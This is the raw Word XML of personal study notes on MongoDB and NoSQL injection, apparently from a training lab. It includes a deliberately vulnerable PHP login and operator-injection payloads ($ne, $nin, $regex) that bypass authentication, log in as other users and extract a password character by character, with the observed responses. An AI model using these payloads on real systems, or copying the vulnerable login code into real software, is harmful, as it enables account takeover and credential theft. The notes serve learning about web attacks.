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EB76E" w14:textId="48E7CF57" w:rsidR="00FA24B1" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00962503">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – data stored in documents, instead of stored in tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C2B8E" w14:textId="77777777" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4598E6F5" w14:textId="0F3F1E4E" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
      <w:r w:rsidRPr="00962503">
        <w:t>{"_id" : ObjectId("5f077332de2cdf808d26cd74"), "username" : "lphillips", "first_name" : "Logan", "last_name" : "Phillips", "age" : "65", "email" : "lphillips@example.com" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31491AA8" w14:textId="77777777" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBC48BB" w14:textId="18064088" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E64FA3" wp14:editId="57CBA560">
            <wp:extent cx="5943600" cy="2563495"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="87346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65177" name="Picture 8734651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E33B7" w14:textId="77777777" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084BEFBC" w14:textId="5CC53F74" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EX: </w:t>
      </w:r>
      <w:r w:rsidRPr="00962503">
        <w:t>To better understand NoSQL queries, let's start by assuming we have a database with a collection of people containing the following three documents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F40BFC" w14:textId="71D821F9" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B9C439F" wp14:editId="4F86369F">
            <wp:extent cx="5629275" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3720937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93722" name="Picture 3720937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C67E" w14:textId="5E23E737" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Built a filter so that only the documents where the last_name is “Sandler” are retrieved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FC85E" w14:textId="5E1FB275" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>[‘last_name’ =&gt; ‘Sandler’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180FA330" w14:textId="77777777" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745DE078" w14:textId="751A24D8" w:rsidR="00962503" w:rsidRDefault="00962503" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Built a filter so that only the documents where gender is male and last_name is Phillips are retrieved: [‘gender’ =&gt; ‘male’, ‘last_name’ =&gt; ‘Phillips’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31295121" w14:textId="77777777" w:rsidR="00530AC9" w:rsidRDefault="00530AC9" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E422BD8" w14:textId="270A20F7" w:rsidR="00530AC9" w:rsidRDefault="00530AC9" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Built a filter to retrieve all documents where the age is less than 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059C179" w14:textId="07E0B668" w:rsidR="00530AC9" w:rsidRDefault="00530AC9" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>[‘age’ =&gt; [‘$lt’ =&gt; ‘50’]]0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308E782" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71814BFF" w14:textId="23B428CB" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00962503">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of NoSQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B83D0" w14:textId="2FE1A769" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Syntax Injection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29D537" w14:textId="2BA70DFF" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Operator Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A92FB" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A385C7F" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t>For the purpose of this example, let's focus on the following code written in PHP for a simple login page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417616FC" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F414C40" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17172478" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>$con = new MongoDB\Driver\Manager("mongodb://localhost:27017");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDED4AD" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1891DCD2" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED13464" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>if(isset($_POST) &amp;&amp; isset($_POST['user']) &amp;&amp; isset($_POST['pass'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD39A79" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        $user = $_POST['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9EC00" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        $pass = $_POST['pass'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F7FE2" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1819F0AC" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        $q = new MongoDB\Driver\Query(['username'=&gt;$user, 'password'=&gt;$pass]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632BBB8" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        $record = $con-&gt;executeQuery('myapp.login', $q );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53585563" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        $record = iterator_to_array($record);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED0A51B" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255AFD76" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(sizeof($record)&gt;0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA6D10" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                $usr = $record[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F6C672" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5627CFC4" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                session_start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A6F90" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                $_SESSION['loggedin'] = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3876CD97" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                $_SESSION['uid'] = $usr-&gt;username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9F15F" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386DA959" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                header('Location: /sekr3tPl4ce.php');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62067B05" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">                die();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAA57CB" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF6CC93" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69132EB1" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>header('Location: /?err=1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF32FEB" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F820843" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRPr="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C77B7" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA1BD16" w14:textId="4579E26A" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t>The web application is making a query to MongoDB, using the "</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>myapp</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t>" database and "</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t xml:space="preserve">" collection, requesting any document that passes the filter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>['username'=&gt;$user, 'password'=&gt;$pass]</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t xml:space="preserve">, where both </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$user</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0DB0">
        <w:t xml:space="preserve"> are obtained directly from HTTP POST parameters. Let's take a look at how we can leverage Operator Injection in order to bypass authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECFA75" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEEA63E" w14:textId="258D644F" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$user = [‘$ne’ =&gt; ‘xxxx’]; $pass = [‘$ne’ =&gt; ‘yyyy’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BDEE94" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02484854" w14:textId="64C02A19" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ex: user[$ne]=xxxx&amp;pass[$ne]=yyyy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A6BCF" w14:textId="77777777" w:rsidR="00AB0DB0" w:rsidRDefault="00AB0DB0" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680D3412" w14:textId="6BAF5448" w:rsidR="00AB0DB0" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>When login: POST parameter: user=asd&amp;pass=awesdf&amp;remember=on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAE656" w14:textId="63338724" w:rsidR="007C32B3" w:rsidRPr="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypass the logging screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FB2FB" w14:textId="7F24A6FD" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user[$ne]=asd&amp;pass[$ne]=awesdf&amp;remember=on =&gt; user admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D8F14" w14:textId="4C9579A7" w:rsidR="007C32B3" w:rsidRPr="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logging in as other users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45253EF0" w14:textId="2B377E50" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user[$nin][]=admin&amp;pass[$ne]=admin&amp;remember=on =&gt; user pedro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085820B6" w14:textId="04E767AA" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user[$nin][]=admin&amp;user[$nin][]=pedro&amp;pass[$ne]=awesdf&amp;remember=on =&gt; user john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29800873" w14:textId="0EAD2AEC" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user[$nin][]=admin&amp;user[$nin][]=pedro&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>user[$nin][]=john&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pass[$ne]=awesdf&amp;remember=on =&gt; user </w:t>
      </w:r>
      <w:r>
        <w:t>secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFEB5CE" w14:textId="1D68D941" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="007C32B3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user[$nin][]=admin&amp;user[$nin][]=pedro&amp;user[$nin][]=john</w:t>
      </w:r>
      <w:r>
        <w:t>&amp;user[$nin][]=secret&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pass[$ne]=awesdf&amp;remember=on =&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F1FA2D" w14:textId="25B0CA8B" w:rsidR="007C32B3" w:rsidRPr="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="007C32B3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extracting User’s Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E6875" w14:textId="0C5A1D37" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Guess the length of a user’s password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B25469D" w14:textId="10CE79E0" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user=admin&amp;pass[$regex]=^.{7}$&amp;remember=on =&gt; HTTP Response Header Location: /?err=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA304F" w14:textId="6686560C" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user=admin&amp;pass[$regex]=^.{</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>}$&amp;remember=on =&gt; HTTP Response Header Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /sek …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE6104" w14:textId="6988C5DD" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Extract the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C3F2E" w14:textId="6B8F7C36" w:rsidR="007C32B3" w:rsidRDefault="007C32B3" w:rsidP="00AB0DB0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user=admin&amp;pass[$regex]=</w:t>
      </w:r>
      <w:r>
        <w:t>^c….$</w:t>
      </w:r>
      <w:r>
        <w:t>&amp;remember=on =&gt; HTTP Response Header Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /err=1</w:t>
      </w:r>
    </w:p>
